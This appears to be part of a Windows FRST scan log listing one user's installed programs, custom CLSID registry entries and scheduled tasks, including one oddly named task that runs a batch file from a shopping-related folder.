AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{C230A275-D2A0-446B-ACE5-06BF067D50F2}) (Version: 50.0.2661.22 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - KB2467175 (HKLM-x32\...\{a0fe116e-9a8a-466f-aee0-625cb7c207e3}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
MobileMe Control Panel (HKLM\...\{41BC9E31-0D39-462E-8E4C-767B21A3B1C3}) (Version: 3.1.8.0 - Apple Inc.)
Mp3tag v2.52 (HKLM-x32\...\Mp3tag) (Version: v2.52 - Florian Heidenreich)
msi Software Install (HKLM-x32\...\{A840FFFB-3A80-4C24-AB34-BE9F56BEB4CE}) (Version: 3.1000.1005.1101 - Micro-Star International Co., Ltd.)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Music Manager (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\MusicManager) (Version:  - Google, Inc.)
MyHarmony (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.0 - Nikon)
NVIDIA GeForce Experience 2.1.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.1 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.92 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Online Plug-in (x32 Version: 14.2.100.14 - Citrix Systems, Inc.) Hidden
Photo Stamp Remover 6.0 (HKLM-x32\...\Photo Stamp Remover_is1) (Version: 6.0 - SoftOrbits)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.5.0 - Nikon)
Poker Tournament Supervisor (HKLM-x32\...\{93ED8388-3C43-4D49-8081-03A0BE7D4E2F}_is1) (Version: 1.3n - Hermann Sorais)
Poker Tournament Supervisor 2 (HKLM-x32\...\{105094B6-4CE8-4AB8-BC17-DDE37F3DE050}}_is1) (Version: 2.0a - Graph & In)
PokerTracker 3 (remove only) (HKLM-x32\...\PokerTracker3) (Version:  - )
PokerTracker 4 (remove only) (HKLM-x32\...\PokerTracker4) (Version:  - )
PostgreSQL 8.3 (HKLM-x32\...\{B823632F-3B72-4514-8861-B961CE263224}) (Version: 8.3 - PostgreSQL Global Development Group)
PX5 Advanced Sound Editor (HKLM-x32\...\{276B495F-9DB0-4FC6-BEB0-85C91FC0F5E2}) (Version: 0.9.0.0 - Turtle Beach)
Quicken 2009 (HKLM-x32\...\{ED2A3C11-3EA8-4380-B59C-F2C1832731B0}) (Version: 18.1.1.29 - Intuit)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.8.8 - Intuit)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RealDownloader (x32 Version: 1.3.2 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 16.0) (Version: 16.0.2 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.72.410.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Remote Control USB Driver (HKLM-x32\...\{8471021C-F529-43DE-84DF-3612E10F58C4}) (Version: 2.3.2.317 - )
Ringtone Expressions 1.6.0 (HKLM-x32\...\Ringtone Expressions) (Version: 1.6.0 - Gx5 L.L.C.)
RogueKiller version 10 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 10 - Adlice Software)
Samsung Content Viewer (HKLM-x32\...\InstallShield_{980DDB3E-8957-4750-98EB-5D04F61CCEDC}) (Version: 1.0.2 - Samsung)
Samsung Content Viewer (x32 Version: 1.0.2 - Samsung) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung SideSync (HKLM-x32\...\Samsung SideSync) (Version: 4.0.2.309 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.56.0 - Samsung Electronics Co., Ltd.)
Self-service Plug-in (x32 Version: 4.2.100.5943 - Citrix Systems, Inc.) Hidden
Sena Bluetooth Device Manager 1.4.2 (HKLM-x32\...\Sena Bluetooth Device Manager) (Version: 1.4.2 - Copyright © 2012 ~ 2013 Sena Technologies Inc.)
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Skifta (HKLM-x32\...\Skifta) (Version: 2.6.2.0 - skifta.com)
Skype™ 6.7 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.7.102 - Skype Technologies S.A.)
SMH10 Manager 1.4 (HKLM-x32\...\SMH10 Manager) (Version: 1.4 - Copyright © 2012 SENA Technologies Inc.)
System Control Manager (HKLM-x32\...\{ED9C5D25-55DF-48D8-9328-2AC0D75DE5D8}) (Version: 2.210.0604.006.19 - Micro-Star International Co., Ltd.)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.38843 - TeamViewer)
Texas Hold'em Poker 3D - Deluxe Edition 1.0 (HKLM-x32\...\{E26DEDC7-1A99-4F8C-9615-6DB112E6495B}_is1) (Version: Texas Hold'em Poker 3D - Deluxe Edition - Play + Smile Marketing GmbH)
Text-To-Speech-Runtime (HKLM-x32\...\{7B3F0113-E63C-4D6D-AF19-111A3165CCA2}) (Version: 1.0.0.0 - Magix Development GmbH)
THX TruStudio Pro (HKLM-x32\...\{4FA6CB9A-2972-4AAF-A36E-3C40FCC22395}) (Version: 1.0 - Creative Technology Limited)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version:  - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
Turtle Beach WinUSB Driver (HKLM\...\{D7593549-B589-40AB-95F0-5ED5AA14D2BC}) (Version: 1.0.1 - Turtle Beach)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
Veetle TV 0.9.18 (HKLM-x32\...\Veetle TV) (Version: 0.9.18 - Veetle, Inc)
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.9.0 - Nikon)
Virtual DJ - Atomix Productions (HKLM-x32\...\Virtual DJ - Atomix Productions) (Version:  - )
VLC media player 2.0.8 (HKLM-x32\...\VLC media player) (Version: 2.0.8 - VideoLAN)
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 4.6 - Vuze Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7500 - Broadcom Corporation)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (02/03/2011 2.4.0.0) (HKLM\...\88C277C6E63CBDAF35A096E80A5B97A29A619D3A) (Version: 02/03/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\8751DB371004DC10847CB5D366A319631EA4E3EA) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (05/10/2011 2.4.0.0) (HKLM\...\9B7C4D96A86401A6757BBE6A4B143083977687BE) (Version: 05/10/2011 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (08/21/2013 2.5.0.3) (HKLM\...\753B2CC50DC57D399D6A69B8563D5ABD5D9F24D3) (Version: 08/21/2013 2.5.0.3 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\02AD34F29D32C048B03F694998ED36AD51FD3A5E) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - Cambridge Silicon Radio Ltd. (CSRBC) USB  (12/13/2012 2.4.0.0) (HKLM\...\5C4609FFB0CD6B7FB69EF6329744776215ADCA7B) (Version: 12/13/2012 2.4.0.0 - Cambridge Silicon Radio Ltd.)
Windows Driver Package - ENE (EUCR) USB  (12/04/2009 5.89.0.64) (HKLM\...\7F973C87231D745EBF31E772CC38BB9B185D3819) (Version: 12/04/2009 5.89.0.64 - ENE)
Windows Driver Package - GoPro (WinUSB) Universal Serial Bus devices  (03/07/2012 ) (HKLM\...\0B624A43DD66DBF5CF3EDFA9741A364E688062A4) (Version: 03/07/2012  - GoPro)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E86236DE-9BD2-42b7-86F6-A829D8EC768C}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\DIRECTV Player\win64\npPlayerPlugin.dll (DIRECTV)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {060DD4D9-6920-4821-8A80-EFF6E5791AF4} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {110D4053-AA73-447C-B6B3-48CD31F6572B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {17C357AD-790B-4487-9EF3-85A67A824811} - System32\Tasks\{97B6A379-97C9-430F-B2E5-15B6C598AC3E} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.114.259/en/abandoninstall?page=tsGoogle&amp;installinfo=google-toolbar:offered-installed,google-chrome:notoffered;toolbaroffered
Task: {17CD11FE-A7DA-4D1F-A4CB-1090BBDFF29B} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {1C07BC4D-6C83-4929-8C27-27540D33FE03} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {1ED8626C-2400-4582-A967-F9A52267AE24} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat
Task: {3DF820E0-8F46-4EB1-B527-90FB60D07C89} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3E30049C-2379-44D4-8849-EEDC4325D38E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {44D3ABD7-2C48-49E1-BA82-77979369651E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
